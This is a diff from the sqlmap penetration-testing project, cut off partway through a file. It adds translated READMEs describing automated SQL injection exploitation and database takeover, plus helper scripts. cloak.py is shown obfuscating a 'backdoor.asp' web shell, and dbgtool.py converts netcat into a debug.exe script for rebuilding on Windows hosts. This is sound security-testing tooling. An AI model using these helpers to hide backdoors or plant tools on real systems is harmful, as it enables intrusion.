[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||||
|
|
||||||
|
Tangkapan Layar
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||||
|
|
||||||
|
Instalasi
|
||||||
|
----
|
||||||
|
|
||||||
|
Anda dapat mengunduh tarball versi terbaru [di sini]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun.
|
||||||
|
|
||||||
|
Penggunaan
|
||||||
|
----
|
||||||
|
|
||||||
|
Untuk mendapatkan daftar opsi dasar gunakan:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
|
||||||
|
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Tautan
|
||||||
|
----
|
||||||
|
|
||||||
|
* Situs: http://sqlmap.org
|
||||||
|
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
|
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
54
doc/translations/README-ja-JP.md
Normal file
54
doc/translations/README-ja-JP.md
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
|
||||||
|
強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
|
||||||
|
|
||||||
|
スクリーンショット
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
wikiに載っているいくつかの機能のデモをスクリーンショットで見ることができます。 [スクリーンショット集](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots)
|
||||||
|
|
||||||
|
インストール
|
||||||
|
----
|
||||||
|
|
||||||
|
最新のtarballを [こちら](https://github.com/sqlmapproject/sqlmap/tarball/master) から、最新のzipballを [こちら](https://github.com/sqlmapproject/sqlmap/zipball/master) からダウンロードできます。
|
||||||
|
|
||||||
|
[Git](https://github.com/sqlmapproject/sqlmap) レポジトリをクローンして、sqlmapをダウンロードすることも可能です。:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmapは、 [Python](http://www.python.org/download/) バージョン **2.6.x** または **2.7.x** がインストールされていれば、全てのプラットフォームですぐに使用できます。
|
||||||
|
|
||||||
|
使用法
|
||||||
|
----
|
||||||
|
|
||||||
|
基本的なオプションとスイッチの使用法をリストするには:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
全てのオプションとスイッチの使用法をリストするには:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
実行例を [こちら](https://asciinema.org/a/46601) で見ることができます。
|
||||||
|
sqlmapの概要、機能の一覧、全てのオプションやスイッチの使用法を例とともに、 [ユーザーマニュアル](https://github.com/sqlmapproject/sqlmap/wiki) で確認することができます。
|
||||||
|
|
||||||
|
リンク
|
||||||
|
----
|
||||||
|
|
||||||
|
* ホームページ: http://sqlmap.org
|
||||||
|
* ダウンロード: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* コミットのRSSフィード: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* 課題管理: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* ユーザーマニュアル: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* よくある質問 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* メーリングリストへの参加: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* メーリングリストのRSSフィード: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* メーリングリストのアーカイブ: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* デモ: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* スクリーンショット: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
54
doc/translations/README-pt-BR.md
Normal file
54
doc/translations/README-pt-BR.md
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
|
||||||
|
|
||||||
|
Imagens
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.
|
||||||
|
|
||||||
|
Instalação
|
||||||
|
----
|
||||||
|
|
||||||
|
Você pode baixar o arquivo tar mais recente clicando [aqui]
|
||||||
|
(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||||
|
|
||||||
|
De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
|
||||||
|
|
||||||
|
Como usar
|
||||||
|
----
|
||||||
|
|
||||||
|
Para obter uma lista das opções básicas faça:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Para obter a lista completa de opções faça:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Você pode encontrar alguns exemplos [aqui](https://asciinema.org/a/46601).
|
||||||
|
Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
|
||||||
|
|
||||||
|
Links
|
||||||
|
----
|
||||||
|
|
||||||
|
* Homepage: http://sqlmap.org
|
||||||
|
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
|
||||||
|
* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
56
doc/translations/README-tr-TR.md
Normal file
56
doc/translations/README-tr-TR.md
Normal file
@@ -0,0 +1,56 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
|
||||||
|
|
||||||
|
|
||||||
|
Ekran görüntüleri
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|
İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
|
||||||
|
|
||||||
|
|
||||||
|
Kurulum
|
||||||
|
----
|
||||||
|
|
||||||
|
[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz.
|
||||||
|
|
||||||
|
Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
|
||||||
|
|
||||||
|
Kullanım
|
||||||
|
----
|
||||||
|
|
||||||
|
|
||||||
|
Bütün basit seçeneklerin listesini gösterir
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
Bütün seçenekleri gösterir
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
Program ile ilgili örnekleri [burada](https://asciinema.org/a/46601) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
|
||||||
|
|
||||||
|
Links
|
||||||
|
----
|
||||||
|
|
||||||
|
* Anasayfa: http://sqlmap.org
|
||||||
|
* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* Mail listesi arşivi: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
52
doc/translations/README-zh-CN.md
Normal file
52
doc/translations/README-zh-CN.md
Normal file
@@ -0,0 +1,52 @@
|
|||||||
|
# sqlmap
|
||||||
|
|
||||||
|
[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
|
||||||
|
|
||||||
|
sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
|
||||||
|
|
||||||
|
演示截图
|
||||||
|
----
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
|
||||||
|
|
||||||
|
安装方法
|
||||||
|
----
|
||||||
|
|
||||||
|
你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
|
||||||
|
|
||||||
|
推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
|
||||||
|
|
||||||
|
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||||
|
|
||||||
|
sqlmap 可以运行在 [Python](http://www.python.org/download/) **2.6.x** 和 **2.7.x** 版本的任何平台上
|
||||||
|
|
||||||
|
使用方法
|
||||||
|
----
|
||||||
|
|
||||||
|
通过如下命令可以查看基本的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -h
|
||||||
|
|
||||||
|
通过如下的命令可以查看所有的用法及命令行参数:
|
||||||
|
|
||||||
|
python sqlmap.py -hh
|
||||||
|
|
||||||
|
你可以从 [这里](https://asciinema.org/a/46601) 看到一个sqlmap 的使用样例。除此以外,你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
|
||||||
|
|
||||||
|
链接
|
||||||
|
----
|
||||||
|
|
||||||
|
* 项目主页: http://sqlmap.org
|
||||||
|
* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||||
|
* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||||
|
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
|
||||||
|
* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
|
||||||
|
* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||||
|
* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
|
||||||
|
* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
|
||||||
|
* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
|
||||||
|
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||||
|
* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
|
||||||
|
* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||||
8
extra/__init__.py
Normal file
8
extra/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
8
extra/beep/__init__.py
Normal file
8
extra/beep/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
96
extra/beep/beep.py
Normal file
96
extra/beep/beep.py
Normal file
@@ -0,0 +1,96 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
beep.py - Make a beep sound
|
||||||
|
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import subprocess
|
||||||
|
import sys
|
||||||
|
import wave
|
||||||
|
|
||||||
|
BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
|
||||||
|
|
||||||
|
def beep():
|
||||||
|
try:
|
||||||
|
if subprocess.mswindows:
|
||||||
|
_win_wav_play(BEEP_WAV_FILENAME)
|
||||||
|
elif sys.platform == "darwin":
|
||||||
|
_mac_beep()
|
||||||
|
elif sys.platform == "linux2":
|
||||||
|
_linux_wav_play(BEEP_WAV_FILENAME)
|
||||||
|
else:
|
||||||
|
_speaker_beep()
|
||||||
|
except:
|
||||||
|
_speaker_beep()
|
||||||
|
|
||||||
|
def _speaker_beep():
|
||||||
|
sys.stdout.write('\a') # doesn't work on modern Linux systems
|
||||||
|
|
||||||
|
try:
|
||||||
|
sys.stdout.flush()
|
||||||
|
except IOError:
|
||||||
|
pass
|
||||||
|
|
||||||
|
def _mac_beep():
|
||||||
|
import Carbon.Snd
|
||||||
|
Carbon.Snd.SysBeep(1)
|
||||||
|
|
||||||
|
def _win_wav_play(filename):
|
||||||
|
import winsound
|
||||||
|
|
||||||
|
winsound.PlaySound(filename, winsound.SND_FILENAME)
|
||||||
|
|
||||||
|
def _linux_wav_play(filename):
|
||||||
|
for _ in ("aplay", "paplay", "play"):
|
||||||
|
if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
|
||||||
|
return
|
||||||
|
|
||||||
|
import ctypes
|
||||||
|
|
||||||
|
PA_STREAM_PLAYBACK = 1
|
||||||
|
PA_SAMPLE_S16LE = 3
|
||||||
|
BUFFSIZE = 1024
|
||||||
|
|
||||||
|
class struct_pa_sample_spec(ctypes.Structure):
|
||||||
|
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
|
||||||
|
|
||||||
|
pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
|
||||||
|
|
||||||
|
wave_file = wave.open(filename, "rb")
|
||||||
|
|
||||||
|
pa_sample_spec = struct_pa_sample_spec()
|
||||||
|
pa_sample_spec.rate = wave_file.getframerate()
|
||||||
|
pa_sample_spec.channels = wave_file.getnchannels()
|
||||||
|
pa_sample_spec.format = PA_SAMPLE_S16LE
|
||||||
|
|
||||||
|
error = ctypes.c_int(0)
|
||||||
|
|
||||||
|
pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
|
||||||
|
if not pa_stream:
|
||||||
|
raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
|
||||||
|
|
||||||
|
while True:
|
||||||
|
latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
|
||||||
|
if latency == -1:
|
||||||
|
raise Exception("Getting latency failed")
|
||||||
|
|
||||||
|
buf = wave_file.readframes(BUFFSIZE)
|
||||||
|
if not buf:
|
||||||
|
break
|
||||||
|
|
||||||
|
if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
|
||||||
|
raise Exception("Could not play file")
|
||||||
|
|
||||||
|
wave_file.close()
|
||||||
|
|
||||||
|
if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
|
||||||
|
raise Exception("Could not simple drain")
|
||||||
|
|
||||||
|
pa.pa_simple_free(pa_stream)
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
beep()
|
||||||
BIN
extra/beep/beep.wav
Normal file
BIN
extra/beep/beep.wav
Normal file
Binary file not shown.
22
extra/cloak/README.txt
Normal file
22
extra/cloak/README.txt
Normal file
@@ -0,0 +1,22 @@
|
|||||||
|
To use cloak.py you need to pass it the original file,
|
||||||
|
and optionally the output file name.
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
$ python ./cloak.py -i backdoor.asp -o backdoor.asp_
|
||||||
|
|
||||||
|
This will create an encrypted and compressed binary file backdoor.asp_.
|
||||||
|
|
||||||
|
Such file can then be converted to its original form by using the -d
|
||||||
|
functionality of the cloak.py program:
|
||||||
|
|
||||||
|
$ python ./cloak.py -d -i backdoor.asp_ -o backdoor.asp
|
||||||
|
|
||||||
|
If you skip the output file name, general rule is that the compressed
|
||||||
|
file names are suffixed with the character '_', while the original is
|
||||||
|
get by skipping the last character. So, that means that the upper
|
||||||
|
examples can also be written in the following form:
|
||||||
|
|
||||||
|
$ python ./cloak.py -i backdoor.asp
|
||||||
|
|
||||||
|
$ python ./cloak.py -d -i backdoor.asp_
|
||||||
8
extra/cloak/__init__.py
Normal file
8
extra/cloak/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
85
extra/cloak/cloak.py
Executable file
85
extra/cloak/cloak.py
Executable file
@@ -0,0 +1,85 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
cloak.py - Simple file encryption/compression utility
|
||||||
|
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import zlib
|
||||||
|
|
||||||
|
from optparse import OptionError
|
||||||
|
from optparse import OptionParser
|
||||||
|
|
||||||
|
def hideAscii(data):
|
||||||
|
retVal = ""
|
||||||
|
for i in xrange(len(data)):
|
||||||
|
if ord(data[i]) < 128:
|
||||||
|
retVal += chr(ord(data[i]) ^ 127)
|
||||||
|
else:
|
||||||
|
retVal += data[i]
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
def cloak(inputFile=None, data=None):
|
||||||
|
if data is None:
|
||||||
|
with open(inputFile, "rb") as f:
|
||||||
|
data = f.read()
|
||||||
|
|
||||||
|
return hideAscii(zlib.compress(data))
|
||||||
|
|
||||||
|
def decloak(inputFile=None, data=None):
|
||||||
|
if data is None:
|
||||||
|
with open(inputFile, "rb") as f:
|
||||||
|
data = f.read()
|
||||||
|
try:
|
||||||
|
data = zlib.decompress(hideAscii(data))
|
||||||
|
except:
|
||||||
|
print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
finally:
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
return data
|
||||||
|
|
||||||
|
def main():
|
||||||
|
usage = '%s [-d] -i <input file> [-o <output file>]' % sys.argv[0]
|
||||||
|
parser = OptionParser(usage=usage, version='0.1')
|
||||||
|
|
||||||
|
try:
|
||||||
|
parser.add_option('-d', dest='decrypt', action="store_true", help='Decrypt')
|
||||||
|
parser.add_option('-i', dest='inputFile', help='Input file')
|
||||||
|
parser.add_option('-o', dest='outputFile', help='Output file')
|
||||||
|
|
||||||
|
(args, _) = parser.parse_args()
|
||||||
|
|
||||||
|
if not args.inputFile:
|
||||||
|
parser.error('Missing the input file, -h for help')
|
||||||
|
|
||||||
|
except (OptionError, TypeError), e:
|
||||||
|
parser.error(e)
|
||||||
|
|
||||||
|
if not os.path.isfile(args.inputFile):
|
||||||
|
print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
if not args.decrypt:
|
||||||
|
data = cloak(args.inputFile)
|
||||||
|
else:
|
||||||
|
data = decloak(args.inputFile)
|
||||||
|
|
||||||
|
if not args.outputFile:
|
||||||
|
if not args.decrypt:
|
||||||
|
args.outputFile = args.inputFile + '_'
|
||||||
|
else:
|
||||||
|
args.outputFile = args.inputFile[:-1]
|
||||||
|
|
||||||
|
f = open(args.outputFile, 'wb')
|
||||||
|
f.write(data)
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
||||||
20
extra/dbgtool/README.txt
Normal file
20
extra/dbgtool/README.txt
Normal file
@@ -0,0 +1,20 @@
|
|||||||
|
To use dbgtool.py you need to pass it the MS-DOS executable binary file,
|
||||||
|
and optionally the output debug.exe script file name.
|
||||||
|
|
||||||
|
Example:
|
||||||
|
|
||||||
|
$ python ./dbgtool.py -i ./nc.exe -o nc.scr
|
||||||
|
|
||||||
|
This will create a ASCII text file with CRLF line terminators called
|
||||||
|
nc.scr.
|
||||||
|
|
||||||
|
Such file can then be converted to its original portable executable with
|
||||||
|
the Windows native debug.exe, that is installed by default in all Windows
|
||||||
|
systems:
|
||||||
|
|
||||||
|
> debug.exe < nc.scr
|
||||||
|
|
||||||
|
To be able to execute it on Windows you have to rename it to end with
|
||||||
|
'.com' or '.exe':
|
||||||
|
|
||||||
|
> ren nc_exe nc.exe
|
||||||
8
extra/dbgtool/__init__.py
Normal file
8
extra/dbgtool/__init__.py
Normal file
@@ -0,0 +1,8 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
pass
|
||||||
95
extra/dbgtool/dbgtool.py
Normal file
95
extra/dbgtool/dbgtool.py
Normal file
@@ -0,0 +1,95 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
dbgtool.py - Portable executable to ASCII debug script converter
|
||||||
|
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
import struct
|
||||||
|
|
||||||
|
from optparse import OptionError
|
||||||
|
from optparse import OptionParser
|
||||||
|
|
||||||
|
def convert(inputFile):
|
||||||
|
fileStat = os.stat(inputFile)
|
||||||
|
fileSize = fileStat.st_size
|
||||||
|
|
||||||
|
if fileSize > 65280:
|
||||||
|
print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
|
||||||
|
sys.exit(1)
|
||||||
|
|
||||||
|
script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
|
||||||
|
script += "%x\nf 0100 ffff 00\n" % fileSize
|
||||||
|
scrString = ""
|
||||||
|
counter = 256
|
||||||
|
counter2 = 0
|
||||||
|
|
||||||
|
fp = open(inputFile, "rb")
|
||||||
|
fileContent = fp.read()
|
||||||
|
|
||||||
|
for fileChar in fileContent:
|
||||||
|
